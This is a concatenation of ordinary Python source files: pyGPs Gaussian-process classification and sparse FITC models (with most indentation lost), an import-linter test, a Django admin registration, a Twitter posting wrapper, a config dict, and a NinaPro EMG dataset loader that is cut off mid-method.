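    t1, t2 = np.meshgrid(np.linspace(-4, 4, 50), np.linspace(-4, 4, 50))
    xs = np.column_stack((t1.ravel(), t2.ravel()))          # grid of test points
    model = GPC()
    model.optimize(x, y)
    model.predict(xs, ys=np.ones((xs.shape[0], 1)))         # fills model.lp
    model.plot(x1, x2, t1, t2)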
class GPMC(object):
'''
This is a one vs. one classification wrapper for GP Classification
'''
def __init__(self, n_class):
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.n_class = n_class # number of different classes
self.x_all = None
self.y_all = None
self.newInf = None # new inference? -> call useInference
self.newLik = None # new likelihood? -> call useLikelihood
self.newPrior = False
def setPrior(self, mean=None, kernel=None):
'''
Set prior mean and covariance other than the default setting of current model.
:param mean: instance of mean class. (e.g. mean.Linear())
:param kernel: instance of covariance class. (e.g. cov.RBF())
'''
# check the type of inputs
# ensure they are the right class before setting prior
if not mean is None:
assert isinstance(mean, pyGPs.mean.Mean), "mean function is not an instance of pyGPs.mean.Mean"
self.meanfunc = mean
self.usingDefaultMean = False
if not kernel is None:
assert isinstance(kernel, pyGPs.cov.Kernel), "cov function is not an instance of pyGPs.cov.Kernel"
self.covfunc = kernel
if type(kernel) is cov.Pre:
self.usingDefaultMean = False
self.newPrior = True
def useInference(self, newInf):
'''
        Use another inference technique other than the default EP inference.
:param str newInf: 'Laplace'
'''
if newInf == "Laplace":
            self.newInf = newInf  # remembered here; applied to each binary GPC in fitAndPredict/optimizeAndPredict
else:
raise Exception('Possible inf values are "Laplace".')
def useLikelihood(self,newLik):
'''
Use another likelihood function other than default error function.
(Not used in this version)
:param str newLik: 'Logistic'
'''
if newLik == "Logistic":
raise Exception("Logistic likelihood is currently not implemented.")
#self.likfunc = lik.Logistic()
else:
raise Exception('Possible lik values are "Logistic".')
def setData(self,x,y):
'''
        Set training inputs and training labels for the model.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
        Note this method will transform x, y to the correct shape
        if x, y are given as 1d arrays.
'''
        # check whether the number of inputs and labels match
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.x_all = x
self.y_all = y
def fitAndPredict(self, xs):
'''
Fit the model with given training data and predict for test points (given by xs).
        predictive_vote is a matrix whose row i corresponds to test point i
        and whose column j gives the probability of class j.
:param xs: test inputs in shape of nn by D
:return: predictive_vote
'''
# check the shape of inputs
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
predictive_vote = np.zeros((xs.shape[0],self.n_class))
for i in range(self.n_class): # classifier for class i...
for j in range(i+1,self.n_class): # ...and class j
x,y = self.createBinaryClass(i,j)
model = GPC()
if self.newPrior:
model.setPrior(mean=self.meanfunc, kernel=self.covfunc)
if self.newInf:
model.useInference(self.newInf)
if self.newLik:
model.useLikelihood(self.newLik)
model.getPosterior(x,y) # fitting
ym = model.predict(xs)[0]
ym += 1 # now scale into 0 to 2, ym=0 is class j, ym=2 is class i
vote_i = np.zeros((xs.shape[0],self.n_class))
vote_j = np.zeros((xs.shape[0],self.n_class))
vote_i[:,i:i+1] = ym
vote_j[:,j:j+1] = 2-ym
predictive_vote += vote_i
predictive_vote += vote_j
predictive_vote /= predictive_vote.sum(axis=1)[:,np.newaxis]
return predictive_vote
def optimizeAndPredict(self, xs):
'''
Optimize the model with given training data and predict for test points (given by xs).
        predictive_vote is a matrix whose row i corresponds to test point i
        and whose column j gives the probability of class j.
:param xs: test inputs in shape of nn by D
:return: predictive_vote
'''
# check the shape of inputs
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
predictive_vote = np.zeros((xs.shape[0],self.n_class))
for i in range(self.n_class): # classifier for class i...
for j in range(i+1,self.n_class): # ...and class j
x,y = self.createBinaryClass(i,j)
model = GPC()
if self.newPrior:
model.setPrior(mean=self.meanfunc, kernel=self.covfunc)
if self.newInf:
model.useInference(self.newInf)
if self.newLik:
model.useLikelihood(self.newLik)
model.optimize(x,y) # training
ym = model.predict(xs)[0]
ym += 1 # now scale into 0 to 2, ym=0 is class j, ym=2 is class i
vote_i = np.zeros((xs.shape[0],self.n_class))
vote_j = np.zeros((xs.shape[0],self.n_class))
vote_i[:,i:i+1] = ym
vote_j[:,j:j+1] = 2-ym
predictive_vote += vote_i
predictive_vote += vote_j
predictive_vote /= predictive_vote.sum(axis=1)[:,np.newaxis]
return predictive_vote
def createBinaryClass(self, i,j):
'''
        Create a dataset x (data) and y (labels) that only contains classes i and j.
        Relabel class i as +1 and class j as -1.
:param int i: the i_th class
:param int j: the j_th class
:return: x(data) and y(label) which only contains class i and j
'''
class_i = []
class_j = []
for index in range(len(self.y_all)): # check all classes
target = self.y_all[index]
if target == i:
class_i.append(index)
elif target == j:
class_j.append(index)
n1 = len(class_i)
n2 = len(class_j)
class_i.extend(class_j)
x = self.x_all[class_i,:]
y = np.concatenate((np.ones((1,n1)),-np.ones((1,n2))),axis=1).T
return x,y
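# Illustrative usage sketch for the one-vs-one GPMC wrapper above; the random
# inputs and integer labels stand in for a real multi-class dataset.
def _demo_gpmc_usage():
    import numpy as np
    n, n_class = 60, 3
    x = np.random.randn(n, 2)                               # training inputs
    y = np.random.randint(0, n_class, size=(n, 1))          # labels in {0, ..., n_class-1}
    xs = np.random.randn(10, 2)                             # test inputs
    model = GPMC(n_class)
    model.setData(x, y)
    vote = model.optimizeAndPredict(xs)                     # (10, n_class) normalised class votes
    return np.argmax(vote, axis=1)                          # predicted class per test point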
class GP_FITC(GP):
'''
Model for FITC GP base class
'''
def __init__(self):
super(GP_FITC, self).__init__()
self.u = None # inducing points
def setData(self, x, y, value_per_axis=5):
'''
        Set training inputs and training labels for the model and derive default inducing points.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
        :param int value_per_axis: number of values per dimension
        when building the default uniformly spaced inducing points
        Note this method will transform x, y to the correct shape
        if x, y are given as 1d arrays.
'''
        # check whether the number of inputs and labels match
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check dimension of inputs
        # transform to the correct shape if necessary
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.x = x
self.y = y
if self.usingDefaultMean:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# get range of x in each dimension
        # value_per_axis uniformly spaced values for each dimension
gridAxis=[]
for d in range(x.shape[1]):
column = x[:,d]
mini = np.min(column)
maxi = np.max(column)
axis = np.linspace(mini,maxi,value_per_axis)
gridAxis.append(axis)
# default inducing points-> a grid
if self.u is None:
self.u = np.array(list(itertools.product(*gridAxis)))
self.covfunc = self.covfunc.fitc(self.u)
def setPrior(self, mean=None, kernel=None, inducing_points=None):
'''
Set prior mean and covariance other than the default setting of current model,
as well as the inducing points
:param mean: instance of mean class. (e.g. mean.Linear())
:param kernel: instance of covariance class. (e.g. cov.RBF())
        :param inducing_points: matrix of inducing points in shape (nu,D)
'''
if not kernel is None:
if not inducing_points is None:
self.covfunc = kernel.fitc(inducing_points)
self.u = inducing_points
else:
if not self.u is None:
self.covfunc = kernel.fitc(self.u)
else:
raise Exception("To use default inducing points, please call setData() first!")
if type(kernel) is cov.Pre:
self.usingDefaultMean = False
if not mean is None:
self.meanfunc = mean
self.usingDefaultMean = False
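# Illustrative sketch of the default inducing-point construction performed by
# GP_FITC.setData above: value_per_axis equally spaced values per input
# dimension, combined into a grid with itertools.product.
def _demo_default_inducing_grid(value_per_axis=5):
    import itertools
    import numpy as np
    x = np.random.randn(100, 2)                             # synthetic 2-d training inputs
    gridAxis = [np.linspace(x[:, d].min(), x[:, d].max(), value_per_axis)
                for d in range(x.shape[1])]
    u = np.array(list(itertools.product(*gridAxis)))        # all grid combinations
    assert u.shape == (value_per_axis ** x.shape[1], x.shape[1])
    return u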
class GPR_FITC(GP_FITC):
'''
Model for Gaussian Process Regression FITC
'''
def __init__(self):
super(GPR_FITC, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
        self.likfunc = lik.Gauss()          # likelihood with default noise variance 0.1
self.inffunc = inf.FITC_Exact() # inference method
self.optimizer = opt.Minimize(self) # default optimizer
self.u = None # no default inducing points
def setNoise(self,log_sigma):
'''
        Set a noise level other than the default noise value.
:param log_sigma: logarithm of the noise sigma
'''
self.likfunc = lik.Gauss(log_sigma)
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
        Overrides the base class; see pyGPs.gp.GP.setOptimizer for usage.
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
def plot(self,axisvals=None):
'''
Plot 1d GP FITC Regression result.
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
'''
plt.figure()
xss = np.reshape(self.xs,(self.xs.shape[0],))
ymm = np.reshape(self.ym,(self.ym.shape[0],))
ys22 = np.reshape(self.ys2,(self.ys2.shape[0],))
plt.plot(self.x, self.y, color=DATACOLOR, ls='None', marker='+',ms=12, mew=2)
plt.plot(self.xs, self.ym, color=MEANCOLOR, ls='-', lw=3.)
plt.fill_between(xss,ymm + 2.*np.sqrt(ys22), ymm - 2.*np.sqrt(ys22), facecolor=SHADEDCOLOR,linewidths=0.0)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.xlabel('input x')
plt.ylabel('output y')
plt.plot(self.u,np.ones_like(self.u), ls='None', color='k',marker='x',markersize=12,mew=2)
plt.show()
def useInference(self, newInf):
'''
        Use another inference technique other than the default exact inference.
:param str newInf: 'Laplace' or 'EP'
'''
if newInf == "Laplace":
self.inffunc = inf.FITC_Laplace()
elif newInf == "EP":
self.inffunc = inf.FITC_EP()
else:
raise Exception('Possible inf values are "Laplace", "EP".')
def useLikelihood(self,newLik):
'''
        Use another likelihood function other than the default Gaussian likelihood.
:param str newLik: 'Laplace'
'''
if newLik == "Laplace":
self.likfunc = lik.Laplace()
self.inffunc = inf.FITC_EP()
else:
raise Exception('Possible lik values are "Laplace".')
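# Illustrative usage sketch for sparse (FITC) regression with GPR_FITC using
# the default inducing grid.  Calling optimize() with no arguments is an
# assumption here: it is taken to reuse the data passed to setData().
def _demo_gpr_fitc_usage():
    import numpy as np
    x = np.linspace(-3, 3, 200)[:, None]                    # training inputs
    y = np.sin(x) + 0.1 * np.random.randn(200, 1)           # noisy targets
    xs = np.linspace(-3, 3, 50)[:, None]                    # test inputs
    model = GPR_FITC()
    model.setData(x, y, value_per_axis=10)                  # builds a 10-point inducing grid
    model.optimize()                                        # fit hyperparameters (assumed no-arg form)
    ymu, ys2, fmu, fs2, lp = model.predict(xs)
    return ymu, ys2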
class GPC_FITC(GP_FITC):
'''
Model for Gaussian Process Classification FITC
'''
def __init__(self):
super(GPC_FITC, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
        self.likfunc = lik.Erf()            # erf likelihood
self.inffunc = inf.FITC_EP() # default inference method
self.optimizer = opt.Minimize(self) # default optimizer
self.u = None # no default inducing points
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
        Overrides the base class; see pyGPs.gp.GP.setOptimizer for usage.
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
def plot(self,x1,x2,t1,t2,axisvals=None):
'''Plot 2d GP FITC classification.
For plotting, we superimpose the data points with the posterior equi-probability contour
lines for the probability of class two given complete information about the generating mechanism.
:param x1: inputs for class +1
:param x2: inputs for class -1
:param t1: meshgrid array for the first axis
:param t2: meshgrid array for the second axis
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
Note these parameters are (only) used for our hard-coded data for classification demo.
'''
fig = plt.figure()
plt.plot(x1[:,0], x1[:,1], 'b+', markersize = 12)
plt.plot(x2[:,0], x2[:,1], 'r+', markersize = 12)
plt.plot(self.u[:,0],self.u[:,1],'ko', markersize=12)
pc = plt.contour(t1, t2, np.reshape(np.exp(self.lp), (t1.shape[0],t1.shape[1]) ))
fig.colorbar(pc)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.show()
def useInference(self, newInf):
'''
        Use another inference technique other than the default FITC EP inference.
        :param str newInf: 'Laplace'
'''
if newInf == "Laplace":
self.inffunc = inf.FITC_Laplace()
else:
raise Exception('Possible inf values are "Laplace".')
def useLikelihood(self,newLik):
'''
        Use another likelihood function other than the default Erf likelihood.
(Not used in this version)
:param str newLik: 'Logistic'
'''
if newLik == "Logistic":
raise Exception("Logistic likelihood is currently not implemented.")
else:
raise Exception('Possible lik values are "Logistic".')
[quality-signal values for the preceding file]
f728acca0a7a5018263431ea24aa5a8ba6852f87 | 154 | py | Python | tests/reporting/review/api.py | ctk3b/borderline | 7c4ab891b36c97038940dea678718dea8ebf5060 | ["MIT"] | null | null | null | tests/reporting/review/api.py | ctk3b/borderline | 7c4ab891b36c97038940dea678718dea8ebf5060 | ["MIT"] | 4 | 2021-09-17T00:53:47.000Z | 2021-09-24T22:05:13.000Z | tests/reporting/review/api.py | ctk3b/borderline | 7c4ab891b36c97038940dea678718dea8ebf5060 | ["MIT"] | null | null | null |
import reporting.report_builder.api
import reporting.report_builder.this_is_a_violation
import reporting.report_builder.this_is_a_grandfathered_violation
[quality-signal values for the preceding file]
f799e614ddaa65cbeb6970a474d2212c8c9e8cd5 | 130 | py | Python | api/user_control/admin.py | richeshgupta/SecureBit | 89a95e7e4df2276294f76803a7bc5b8d7f99d436 | ["MIT"] | 1 | 2021-07-03T04:51:55.000Z | 2021-07-03T04:51:55.000Z | api/user_control/admin.py | richeshgupta/SecureBit | 89a95e7e4df2276294f76803a7bc5b8d7f99d436 | ["MIT"] | 6 | 2021-03-24T11:23:41.000Z | 2022-02-27T12:24:37.000Z | api/user_control/admin.py | richeshgupta/SecureBit | 89a95e7e4df2276294f76803a7bc5b8d7f99d436 | ["MIT"] | null | null | null |
from django.contrib import admin
from .models import CustomUser, Jwt, Favorite
admin.site.register((CustomUser, Jwt, Favorite))
[quality-signal values for the preceding file]
e3a7cbc8374af3fd768fb93949f32d80b7061feb | 2,704 | py | Python | src/post.py | BaseOutside/twiapi-wrapper | b2d55d0f56431cd0e23038300024e55e61e54ca4 | ["MIT"] | null | null | null | src/post.py | BaseOutside/twiapi-wrapper | b2d55d0f56431cd0e23038300024e55e61e54ca4 | ["MIT"] | null | null | null | src/post.py | BaseOutside/twiapi-wrapper | b2d55d0f56431cd0e23038300024e55e61e54ca4 | ["MIT"] | null | null | null |
import config
import json
import base64
def tweet(text, *img):
if len(img) > 4:
print("too many images")
return -1
if type(text) != str:
text = str(text)
twitter = config.twitter
url = "https://api.twitter.com/1.1/statuses/update.json"
url_img = "https://upload.twitter.com/1.1/media/upload.json"
media_id = []
for i in range(len(img)):
files = {"media" : img[i]}
res_img = twitter.post(url_img, files = files)
if res_img.status_code != 200:
print("Failed to upload image : %s" % res_img.text)
return -1
media_id.append(json.loads(res_img.text)["media_id"])
if len(media_id) == 0:
params = {"status" : text}
else:
params = {"status" : text, "media_ids" : ",".join(map(str, media_id))}
res = twitter.post(url, params = params)
if res.status_code != 200:
print("Post tweet failed : %s" % res.text)
def reply(in_reply_to_status_id, text, *img):
if len(img) > 4:
print("too many images")
return -1
if type(text) != str:
text = str(text)
twitter = config.twitter
url = "https://api.twitter.com/1.1/statuses/update.json"
url_img = "https://upload.twitter.com/1.1/media/upload.json"
media_id = []
for i in range(len(img)):
files = {"media" : img[i]}
res_img = twitter.post(url_img, files = files)
if res_img.status_code != 200:
print("Failed to upload image : %s" % res_img.text)
return -1
media_id.append(json.loads(res_img.text)["media_id"])
if len(media_id) == 0:
params = {"status" : text}
else:
params = {"status" : text, "media_ids" : ",".join(map(str, media_id))}
params["in_reply_to_status_id"] = in_reply_to_status_id
res = twitter.post(url, params = params)
if res.status_code != 200:
print("Post tweet failed : %s" % res.text)
def icon(image):
twitter = config.twitter
url = "https://api.twitter.com/1.1/account/update_profile_image.json"
enc_img = base64.b64encode(image)
params = {"image": enc_img}
res = twitter.post(url, data = params)
if res.status_code != 200:
print("Post image failed. : %s" % res.text)
return -1
def name(name):
if type(name) != str:
name = str(name)
twitter = config.twitter
url = "https://api.twitter.com/1.1/account/update_profile.json"
params = {"name" : name}
res = twitter.post(url, params = params)
if res.status_code != 200:
print("Post name failed. : %s" % res.text)
return -1
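# Illustrative usage sketch: the helpers above assume config.twitter is an
# already-authenticated OAuth1 session object exposing .post() (for example a
# requests_oauthlib.OAuth1Session built from the app and access tokens).
# "picture.png" is a hypothetical local file.
if __name__ == "__main__":
    tweet("hello world")                                    # plain status update
    with open("picture.png", "rb") as f:
        tweet("status with one image", f.read())            # up to four images accepted
    name("new display name")                                # update the profile name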
[quality-signal values for the preceding file]
e3d77cb04716e6d50ee8c5b70fa6bdd5ed63bcb5 | 126 | py | Python | src/spaceone/monitoring/conf/proto_conf.py | choonho/plugin-api-direct-mon-webhook | a5c97c410e91b4a98db3594868e6b495ec6e9f48 | ["Apache-2.0"] | 1 | 2021-11-25T02:57:36.000Z | 2021-11-25T02:57:36.000Z | src/spaceone/monitoring/conf/proto_conf.py | choonho/plugin-api-direct-mon-webhook | a5c97c410e91b4a98db3594868e6b495ec6e9f48 | ["Apache-2.0"] | 2 | 2022-02-10T05:32:56.000Z | 2022-03-17T12:17:20.000Z | src/spaceone/monitoring/conf/proto_conf.py | choonho/plugin-api-direct-mon-webhook | a5c97c410e91b4a98db3594868e6b495ec6e9f48 | ["Apache-2.0"] | 3 | 2021-08-19T10:42:45.000Z | 2021-11-23T03:02:09.000Z |
PROTO = {
'spaceone.monitoring.api.plugin.webhook': ['Webhook'],
'spaceone.monitoring.api.plugin.event': ['Event'],
}
[quality-signal values for the preceding file]
5407cc2b2de75d9da1b27de77f6ed7330182aaf1 | 17,575 | py | Python | expert/NinaPro/semg_repro/data.py | rtu715/NAS-Bench-360 | d075006848c664371855c34082b0a00cda62be67 | ["MIT"] | 10 | 2021-06-15T17:48:34.000Z | 2022-02-23T18:34:28.000Z | expert/NinaPro/semg_repro/data.py | rtu715/NAS-Bench-360 | d075006848c664371855c34082b0a00cda62be67 | ["MIT"] | 1 | 2021-11-12T15:12:38.000Z | 2021-11-12T19:38:00.000Z | expert/NinaPro/semg_repro/data.py | rtu715/NAS-Bench-360 | d075006848c664371855c34082b0a00cda62be67 | ["MIT"] | 1 | 2021-11-15T04:07:17.000Z | 2021-11-15T04:07:17.000Z |
# built in libraries
import random
import multiprocessing
# third party
import numpy as np
from scipy import signal
from scipy.io import loadmat
# local
from label_dict import label_dict
from bc_dict import bc_dict
# build window rolling scheme
def roll_labels(x, y):
labs_rolled = []
for i in range(len(y)):
l = y[i]
n = x[i].shape[0]
labs_rolled.append(np.repeat(l, n))
return np.hstack(labs_rolled)
def window_roll(a, stepsize=5, width=52):
n = a.shape[0]
emg = np.dstack([a[i : 1 + n + i - width : stepsize] for i in range(0, width)])
return emg
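# Illustrative sketch of the shapes produced by the helpers above: for an
# (n, channels) signal, window_roll returns (num_windows, channels, width)
# with num_windows = (n - width)//stepsize + 1; roll_labels(x, y) repeats
# label y[i] x[i].shape[0] times and stacks the result so labels line up with
# the windowed data.
def _demo_window_roll():
    a = np.arange(40).reshape(20, 2)                        # 20 samples, 2 channels
    windows = window_roll(a, stepsize=4, width=8)
    assert windows.shape == (4, 2, 8)                       # (20-8)//4 + 1 = 4 windows
    return windows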
# build augmentation scheme
def add_noise_snr(signal, snr=25):
# convert signal to db
sgn_db = np.log10((signal ** 2).mean(axis=0)) * 10
# noise in db
noise_avg_db = sgn_db - snr
# convert noise_db
noise_variance = 10 ** (noise_avg_db / 10)
# make some white noise using this as std
noise = np.random.normal(0, np.sqrt(noise_variance), signal.shape)
return signal + noise
# noise factors to sample from, outside of the function because this will be
# called millions of times
rlist = sum([[(x / 2) % 30] * ((x // 2) % 30) for x in range(120)], [])
def add_noise_random(signal):
num = random.choice(rlist)
return add_noise_snr(signal, num)
# moving average
def moving_average(data_set, periods=3):
weights = np.ones(periods) / periods
return np.convolve(data_set, weights, mode="valid")
def ma(window, n):
return np.vstack(
[moving_average(window[:, i], n) for i in range(window.shape[-1])]
).T
def ma_batch(batch, n):
return np.dstack([ma(batch[i, :, :], n) for i in range(batch.shape[0])])
# butter filter preprocess
def _butter_highpass(cutoff, fs, order=3):
# nyquist frequency!!
nyq = 0.5 * fs
normal_cutoff = cutoff / nyq
b, a = signal.butter(order, normal_cutoff, btype="high", analog=False)
return b, a
def butter_highpass_filter(data, cutoff=2, fs=200, order=3):
b, a = _butter_highpass(cutoff=cutoff, fs=fs, order=order)
y = signal.lfilter(b, a, data)
return y
# dataset loading class:
# first some helpers:
def first0(x):
return np.unique(x)[0]
def first_appearance(arr):
# gets the first class in the case of overlapping due to our windowing
inn = [arr[i] for i in range(arr.shape[0])]
with multiprocessing.Pool(None) as p:
res = p.map(first0, inn)
return np.asarray(res)
class dataset(object):
def __init__(
self,
path,
butter=True,
rectify=True,
ma=15,
step=5,
window=52,
exercises=["a", "b", "c"],
features=None,
):
self.path = path
self.butter = butter
self.rectify = rectify
self.ma = ma
self.step = step
self.window = window
self.exercises = exercises
self.features = features
# load the data
self.read_data()
self.process_data()
def _load_file(self, path, ex, features=None):
"""
loads a file given a path, and relabels it according to the exercise dict
provided in label_dict. Each set of trials has labels starting at 0,
which needs to be corrected
"""
res = loadmat(path)
data = []
# imu data
imu = res["acc"].copy()
# repetition labeled by a machine (more accurate labels, this is what we
# will use to split the data by)
rep = res["rerepetition"].copy()
# emg data
emg = res["emg"].copy()
# machine labeled exercises
lab = res["restimulus"].copy()
# relabel 0:52
if 'a' not in self.exercises:
lab = np.array([[bc_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
else:
lab = np.array([[label_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
del res
# make it possible to engineer features
data.append(emg)
if features:
for ft in features:
print("adding features")
sameDim = data[0].shape[0] == np.shape(res[ft])[0]
newData = []
if not sameDim and np.shape(res[ft])[1] == 1:
newData = np.full((np.shape(data[0])[0], 1), res[ft][0, 0])
else:
newData = res[ft]
data.append(newData)
return np.concatenate(data, axis=1), lab, rep, imu
def _load_by_trial(self, trial=1, features=None):
data = []
labs = []
reps = []
imu = []
for i in range(1, 11):
path = f"{self.path}/s{i}/S{i}_E{trial}_A1.mat"
emg, l, r, ii = self._load_file(path, ex=trial, features=features)
data.append(emg)
labs.append(l)
reps.append(r)
imu.append(ii)
return data, labs, reps, imu
def read_data(self):
ex_dict = dict(zip(["a", "b", "c"], range(1, 4)))
self.emg = []
self.labels = []
self.repetition = []
self.imu = []
for e in self.exercises:
# In the papers the exercises are lettered not numbered, but to load
# the data properly we need them to be numbered. an exercise
            # represents a group of either hand motions, functional motions, or
# wrist motions
exercise = ex_dict[e]
emg, lab, rep, imu = self._load_by_trial(trial=exercise, features=self.features)
self.emg += emg
self.labels += lab
self.repetition += rep
self.imu += imu
print(sum([x.shape[0] for x in self.emg]))
def process_data(self):
if self.rectify:
self.emg = [np.abs(x) for x in self.emg]
if self.butter:
self.emg = [butter_highpass_filter(x) for x in self.emg]
self.flat = [self.emg, self.labels, self.repetition, self.imu]
self.emg = [window_roll(x, self.step, self.window) for x in self.emg]
self.imu = [window_roll(x, self.step, self.window) for x in self.imu]
self.labels = [window_roll(x, self.step, self.window) for x in self.labels]
self.repetition = [window_roll(x, self.step, self.window) for x in self.repetition]
# reshape the data to have the axes in the proper order
self.emg = np.moveaxis(np.concatenate(self.emg, axis=0), 2, 1)
self.imu = np.moveaxis(np.concatenate(self.imu, axis=0), 2, 1)
self.labels = np.moveaxis(np.concatenate(self.labels, axis=0), 2, 1)[..., -1]
self.repetition = np.moveaxis(np.concatenate(self.repetition, axis=0), 2, 1)[..., -1]
# we split by repetition, and we do not want any data leaks. So, we
# simply drop any window that has more than one repetition in it
no_leaks = np.array(
[
i
for i in range(self.repetition.shape[0])
if np.unique(self.repetition[i]).shape[0] == 1
]
)
self.emg = self.emg[no_leaks, :, :]
self.imu = self.imu[no_leaks, :, :]
self.labels = self.labels[no_leaks, :]
self.repetition = self.repetition[no_leaks, :]
        # next we want to make sure there aren't multiple labels. We do this
# using the first class that appears in a window. Intuitively, this
# makes sense, as when someone is grabbing something then finishes
# halfway through, they still completed the act of grabbing something
self.labels = first_appearance(self.labels)
self.repetition = first_appearance(self.repetition)
self.emg = self.emg.astype(np.float16)
self.imu = self.imu.astype(np.float16)
class nina4_dataset(dataset):
def __init__(
self,
path,
butter=True,
rectify=True,
ma=15,
step=5,
window=52,
exercises=["a", "b", "c"],
features=None,
n_subjects=10
):
self.path = path
self.n_subjects = n_subjects
self.butter = butter
self.rectify = rectify
self.ma = ma
self.step = step
self.window = window
self.exercises = exercises
self.features = features
# load the data
print("reading")
self.read_data()
print("processing")
self.process_data()
def _load_file(self, path, ex, features=None):
"""
loads a file given a path, and relabels it according to the exercise dict
provided in label_dict. Each set of trials has labels starting at 0,
which needs to be corrected
"""
res = loadmat(path)
data = []
# repetition labeled by a machine (more accurate labels, this is what we
# will use to split the data by)
rep = res["rerepetition"].copy()
# emg data
emg = res["emg"].copy()
# machine labeled exercises
lab = res["restimulus"].copy()
# relabel 0:52
lab = np.array([[label_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
del res
# make it possible to engineer features
data.append(emg)
if features:
for ft in features:
print("adding features")
sameDim = data[0].shape[0] == np.shape(res[ft])[0]
newData = []
if not sameDim and np.shape(res[ft])[1] == 1:
newData = np.full((np.shape(data[0])[0], 1), res[ft][0, 0])
else:
newData = res[ft]
data.append(newData)
return np.concatenate(data, axis=1), lab, rep
def _load_by_trial(self, trial=1, features=None):
data = []
labs = []
reps = []
for i in range(1, self.n_subjects+1):
path = f"{self.path}/s{i}/S{i}_E{trial}_A1.mat"
emg, l, r = self._load_file(path, ex=trial, features=features)
data.append(emg)
labs.append(l)
reps.append(r)
return data, labs, reps
def read_data(self):
ex_dict = dict(zip(["a", "b", "c"], range(1, 4)))
self.emg = []
self.labels = []
self.repetition = []
for e in self.exercises:
# In the papers the exercises are lettered not numbered, but to load
# the data properly we need them to be numbered. an exercise
# represents a group of either hand motions, funcitonal motions, or
# wrist motions
exercise = ex_dict[e]
emg, lab, rep = self._load_by_trial(trial=exercise, features=self.features)
self.emg += emg
self.labels += lab
self.repetition += rep
def process_data(self):
if self.rectify:
self.emg = [np.abs(x) for x in self.emg]
if self.butter:
self.emg = [butter_highpass_filter(x) for x in self.emg]
print("rolling")
self.emg = [window_roll(x, self.step, self.window) for x in self.emg]
self.labels = [window_roll(x, self.step, self.window) for x in self.labels]
self.repetition = [window_roll(x, self.step, self.window) for x in self.repetition]
# reshape the data to have the axes in the proper order
self.emg = np.moveaxis(np.concatenate(self.emg, axis=0), 2, 1)
self.labels = np.moveaxis(np.concatenate(self.labels, axis=0), 2, 1)[..., -1]
self.repetition = np.moveaxis(np.concatenate(self.repetition, axis=0), 2, 1)[..., -1]
# we split by repetition, and we do not want any data leaks. So, we
# simply drop any window that has more than one repetition in it
no_leaks = np.array(
[
i
for i in range(self.repetition.shape[0])
if np.unique(self.repetition[i]).shape[0] == 1
]
)
self.emg = self.emg[no_leaks, :, :]
self.labels = self.labels[no_leaks, :]
self.repetition = self.repetition[no_leaks, :]
        # next we want to make sure there aren't multiple labels. We do this
# using the first class that appears in a window. Intuitively, this
# makes sense, as when someone is grabbing something then finishes
# halfway through, they still completed the act of grabbing something
print("cleaning")
self.labels = first_appearance(self.labels)
self.repetition = first_appearance(self.repetition)
self.emg = self.emg.astype(np.float16)
class nina1_dataset(dataset):
def __init__(
self,
path,
butter=True,
rectify=True,
ma=15,
step=5,
window=52,
exercises=["a", "b", "c"],
features=None,
n_subjects=27
):
self.path = path
self.n_subjects = n_subjects
self.butter = butter
self.rectify = rectify
self.ma = ma
self.step = step
self.window = window
self.exercises = exercises
self.features = features
# load the data
print("reading")
self.read_data()
print("processing")
self.process_data()
def _load_file(self, path, ex, features=None):
"""
loads a file given a path, and relabels it according to the exercise dict
provided in label_dict. Each set of trials has labels starting at 0,
which needs to be corrected
"""
res = loadmat(path)
data = []
# repetition labeled by a machine (more accurate labels, this is what we
# will use to split the data by)
rep = res["rerepetition"].copy()
# emg data
emg = res["emg"].copy()
# machine labeled exercises
lab = res["restimulus"].copy()
# relabel 0:52
lab = np.array([[label_dict[ex][lab[i][0]]] for i in range(lab.shape[0])])
del res
# make it possible to engineer features
data.append(emg)
if features:
for ft in features:
print("adding features")
sameDim = data[0].shape[0] == np.shape(res[ft])[0]
newData = []
